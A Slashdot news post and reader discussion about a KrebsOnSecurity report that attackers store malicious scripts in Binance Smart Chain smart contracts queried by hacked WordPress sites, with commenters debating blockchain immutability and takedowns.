Please create an account to participate in the Slashdot moderation system

 



Forgot your password?
typodupeerror
×
Crime The Almighty Buck

Scammers Try Hosting Their Malware on a Binance Network (krebsonsecurity.com) 21

Breached web sites distribute malware to visitors by claiming they need to update their browser. But one group of attackers "have developed an ingenious way of keeping their malware from being taken down by security experts or law enforcement," reports security researcher Brian Krebs.

"By hosting the malicious files on a decentralized, anonymous cryptocurrency blockchain." [W]hen Cloudflare blocked those accounts the attackers began storing their malicious files as cryptocurrency transactions in the Binance Smart Chain (BSC), a technology designed to run decentralized apps and "smart contracts," or coded agreements that execute actions automatically when certain conditions are met. Nati Tal, head of security at Guardio Labs, the research unit at Tel Aviv-based security firm Guardio, said the malicious scripts stitched into hacked WordPress sites will create a new smart contract on the BSC Blockchain, starting with a unique, attacker-controlled blockchain address and a set of instructions that defines the contract's functions and structure. When that contract is queried by a compromised website, it will return an obfuscated and malicious payload.

"These contracts offer innovative ways to build applications and processes," Tal wrote along with his Guardio colleague Oleg Zaytsev. "Due to the publicly accessible and unchangeable nature of the blockchain, code can be hosted 'on-chain' without the ability for a takedown." Tal said hosting malicious files on the Binance Smart Chain is ideal for attackers because retrieving the malicious contract is a cost-free operation that was originally designed for the purpose of debugging contract execution issues without any real-world impact. "So you get a free, untracked, and robust way to get your data (the malicious payload) without leaving traces," Tal said.

In response to questions from KrebsOnSecurity, the BNB Smart Chain (BSC) said its team is aware of the malware abusing its blockchain, and is actively addressing the issue. The company said all addresses associated with the spread of the malware have been blacklisted, and that its technicians had developed a model to detect future smart contracts that use similar methods to host malicious scripts. "This model is designed to proactively identify and mitigate potential threats before they can cause harm," BNB Smart Chain wrote. "The team is committed to ongoing monitoring of addresses that are involved in spreading malware scripts on the BSC. To enhance their efforts, the tech team is working on linking identified addresses that spread malicious scripts to centralized KYC [Know Your Customer] information, when possible."

This discussion has been archived. No new comments can be posted.

Scammers Try Hosting Their Malware on a Binance Network

Comments Filter:
  • it finds innovative ways to be even more terrible.

    the attackers began storing their malicious files as cryptocurrency transactions in the Binance Smart Chain

    All those megawatt-hours wasted on that...

    • by taustin ( 171655 )

      It's the gift that keeps on giving.

      Like any good STD.

    • by gweihir ( 88907 )

      That is not really new or innovative. The idea has been around for a long time. Using a "smart" contract makes it a bit more sophisticated, but essentially the idea of using the blockchain to host some illegal content is as old as the idea of a public distributed blockchain. I remember discussing this with other security folks a long time ago and we all agreed it was only a matter of time.

  • Makes one wonder (Score:4, Interesting)

    by ArmoredDragon ( 3450605 ) on Saturday October 21, 2023 @01:02PM (#63942235)

    Seems like it's hard to delete stuff from the ledger once it's out there. So what if somebody encoded illegal stuff like kiddie porn or pirated movies/music into the blockchain inside of tiny but nevertheless legitimate transactions? How do you get all of the nodes to agree to scrub older transactions?

    • by rsilvergun ( 571051 ) on Saturday October 21, 2023 @01:10PM (#63942257)
      The people who are actually in charge of the blockchain would remove it. One of the dirty little secrets of blockchains and crypto is that they are not actually decentralized. Over time you get winners and losers just like in any other financial system and you end up with people who have a disproportionate amount of control over the chain. And that's just for the ones that were designed to be resistant to central control. Not familiar with the guts of the binance chain but a lot of these crypto chains are completely controlled by one organization and they just pretend to be decentralized. It's like a corporation word one guy owns 51% of the stock
      • The people who are actually in charge of the blockchain would remove it. One of the dirty little secrets of blockchains and crypto is that they are not actually decentralized.

        Have you looked at the source bitcoin code? I have (admittedly only scanning much of it) and I haven't seen a mechanism for actually removing past entries. Even if there was, it doesn't seem like it would work without seriously breaking things. If you send a transaction for some btc, and then subsequently move that btc again to yet another wallet, if you delete the first transaction then you end up with a situation where different nodes disagree about how much is in that second wallet, which breaks other th

      • So what if somebody encoded illegal stuff like kiddie porn or pirated movies/music into the blockchain inside of tiny but nevertheless legitimate transactions? How do you get all of the nodes to agree to scrub older transactions?

        The people who are actually in charge of the blockchain would remove it.

        Cp was encoded on the Bitcoin Satoshi Vision (BSV) ledger https://www.bbc.com/news/techn... [bbc.com] I can't find any information suggested it's been removed (they did remove an automatic browsing feature on their homepage so it wouldn't be displayed there).

        • I'm not 100% sure, but I think they only embedded URLs to CP. I don't think there was actual CP material in the blockchain itself (but again, I may be mistaken about this).

          • I'm not 100% sure, but I think they only embedded URLs to CP. I don't think there was actual CP material in the blockchain itself (but again, I may be mistaken about this).

            That was another case concerning the bitcoin (BTC) ledger. This was Bitcoin Satoshi Vision (BSV) where people could upload avatars to the homepage and write a message both which was encoded on the blockchain and was displayed on the homepage, so someone uploaded a cp avatar.

            • I could foresee some possible mechanisms of using embedding much larger amounts of data on to the blockchain.

              One way would be using a (reversed) linked-list style data structure. Essentially you chunk the file to be within the size constraints of the protocol, then post the first chunk, then post the next chunk starting with a pointer to the hash ID of the previous blockchain transaction, repeating until the entire file has been sent. Then you indicate the location of the file in the blockchain with nothing

              • Sounds workable to me. If i remember correctly BSV has a 100k message limit per transaction (BTC 100 char). I have no idea if there are protocols with an even higher limit.

      • You clearly have no idea how the blockchain works. You can't "remove" or "undo" a transaction without rolling back all transactions which happened since, and precisely no one would clobber a legit transaction to remove something illegal as that would instantly annihilate any value of the blockchain itself.

        The risk of a 51% attack comes from the ability to certify your own transactions. You can certify a change, but you can't certify faking previous transactions. I.e. Someone can say your wallet with address

  • They must educate users that the only way to officially update their browser is through the browser itself, and they should have a dedicated update button rather than the method of going to the about screen which isn't intuitive enough for beginners. Like I said before, help the millions of unemployed programmers get legitimate careers so they don't turn to scamming ones.
    • There are billions of people on this planet and a handful of malicious computers can do a lot of damage. This isn't really a problem you can fully solve with education and this is coming from me who loves educating people to solve social issues. The problem is that even if you only have a few percentage points of people who follow the scam your going to have potentially large network problems because of how powerful even cheap laptop computers are and how fast broadband is even over relatively cheap Wi-Fi i
  • So, in other words, nothing has changed since day 1.
  • " the malicious scripts stitched into hacked WordPress sites will create a new smart contract on the BSC Blockchain, starting with a unique, attacker-controlled blockchain address and a set of instructions that defines the contract's functions and structure. When that contract is queried by a compromised website, it will return an obfuscated and malicious payload."

    I'm frequently amazed at the ingenuity of scammers, and honestly, this is pretty fucking clever.

  • I believe that this is part of the features of these types of tools, to deliver payloads to computers to process, for all kinds of contract reasons.

    That's pretty cool.

    But how do you tell a malicious payload from a normal contract payload? That falls into the area that Apple and Google currently struggle with.

    • by gweihir ( 88907 )

      But how do you tell a malicious payload from a normal contract payload?

      Essentially impossible. Especially as you can do things like put encrypted content in one place and the key in another. The only real malware defense is to not run it. Everything else is half-measures that are more "hopeful engineering" than actual solutions.

  • At least to me. Attacks placing illegal content on public blockchains have been discussed for a long time, both for sabotaging the blockchain and for making that stuff available publicly. This is just a variant where the blockchain is used as a "bulletproof" hosting provider for malware.

  • Am I missing something here? The attack code appears to just have the client hitting a binance-provided API over perfectly normal HTTP to receive some JSON from a perfectly ordinary HTTP server that just happens to be providing the response based on the contents of a database. Sure, that database is 'the blockchain'; but (even if it is functionally immutable) there's absolutely nothing special stopping binance from replying to API requests however they like; or either endpoint or network security measures j
  • You can look at this as a trial-run on securing QFS or whatever networked banking platform.

    The ultimate threat scenario is an .exe hidden in the message stream. Crypto only gets security so far due to its limiting factor - secret bit size. SO whatever implications are derived on-chain directly apply in QFS world.

    A hiccup for cashless even though quantum wants you to buy the narrative its too good, too fast and immune to a such an attack.

"The vast majority of successful major crimes against property are perpetrated by individuals abusing positions of trust." -- Lawrence Dalzell

Working...